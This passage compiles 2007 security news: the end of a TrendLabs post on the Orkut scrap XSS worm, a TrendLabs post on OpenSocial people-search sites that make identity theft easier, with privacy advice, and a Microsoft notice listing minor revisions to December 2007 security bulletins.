This just to show how Orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.”

It appears from both the script which we have analysed and this description that this script was designed purely to spread, rather than for more malicious purposes normally associated with this type of attack. The author has since pulled the malicious JavaScript from the Web, having apparently gotten his point across.

The attack works due to Orkut allowing users to embed Flash content in their scrap posts (although it does filter for normal XSS techniques). The author appears to have created a SWFObject that calls the malicious JavaScript and was able to use this to bypass Orkuts filters.

This is not the first time a worm like this has targeted a social network. MySpace fell victim to the infamous “Samy Is My Hero” XSS Worm released in 2005.

Luckily for the almost half a million users, this was purely a proof of concept. The possible implications of a more malicious attack in the future however are much more worrying.

Source: Orkut/Google Worms Compromise Over 400,000 Accounts - TrendLabs | Malware Blog - by Trend Micro

Identity Theft Made Easy

December 19th, 2007 by Robert McArdle

In today’s world of social networking sites, finding enough information to impersonate someone is trivial at best. The only difficult part of the process is tracking down an individual from, say, their email address to their profile on a MySpace or Bebo page. With the new OpenSocial initiative, this has become a lot easier to do.

Sites such as Spokeo, Spock and a whole host of others will gladly trawl all available OpenSocial social networks if supplied with an email address of a “friend.” The full list of services implemented depends on the site, but a full list of the services provided by Spokeo is available here. This stuff is a dream come true for identity thieves.

Let’s take an example. I decided to use my own email address and see what I could find out about myself. Now it should be noted that I do not take part in a lot of online social networking, so this should yield higher results in most cases. Also, I deliberately set my status to “public” on the networks that I do frequent for the purposes of the experiment as these services (luckily) will not trawl private pages.

The search showed my Bebo account, Picasa account, my personal blog, my Amazon WishList and all entries I have made to Digg.com. Note that OpenSocial does not include Facebook, so that did not show up. I have been careful to keep personal data off the Web, but had completely forgotten about the Picasa and Amazon pages.

For added effect, I decided to pick one of my friends at random, and just using their email address, to find out as much about them as possible. Obviously I won’t call out the exact details, but here’s a taster: name, address, date of birth, photos, family members, location of work plus full education/work history, phone number, likes/dislikes, pets, and a whole lot more.

Considering that most banks ask for less information than that when changing details, you begin to get an idea of how big an issue this is.

My advice for people out there using social networking sites is to mark your profiles as private wherever possible. You could even use one of the services mentioned above to check what information you have left open—if you are comfortable giving them the logins to your accounts of course.

Source: Identity Theft Made Easy - TrendLabs | Malware Blog - by Trend Micro

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: December 19, 2007

********************************************************************

Summary

=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-063 - Important

* MS07-064 - Critical

* MS07-065 - Important

* MS07-066 - Important

* MS07-068 - Critical

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-063 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-063.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Reference Table portion of the Security Update

Information section.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

* MS07-064 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Windows Vista Reference Table

portion of the Security Update Information section. Also removed the web-based mitigation from vulnerability CVE-2007-3901.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.2

* MS07-065 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

- Reason for Revision: Bulletin updated to combine references to Windows 2000 Professional and Windows 2000 Server with a

reference to Windows 2000 due to both platforms sharing the same vulnerability and severity.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Important

- Version: 1.2

* MS07-066 - Important

http://www.microsoft.com/technet/security/bulletin/ms07-066.mspx

- Reason for Revision: Bulletin updated to reflect a change to

the Removal Information text in the Reference Table portion

of the Security Update Information section.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Important

- Version: 1.2

* MS07-068 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-068.mspx

- Reason for Revision: Bulletin updated to reflect a change to the Removal Information text in the Reference Table portion

of the Security Update Information section for Windows Vista.

- Originally posted: December 11, 2007

- Updated: December 19, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

* MS07-069 - Critical

http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin updated to reflect a known issue; a change to the Removal Information text in the Windows Vista

Reference Table in the Security Update Information section; and, a change to the File Information text in the Reference Table

within the Security Update Information section for all affected operating systems.

- Originally posted: December 11, 2007

- Updated: December 18, 2007

- Bulletin Severity Rating: Critical

- Version: 1.2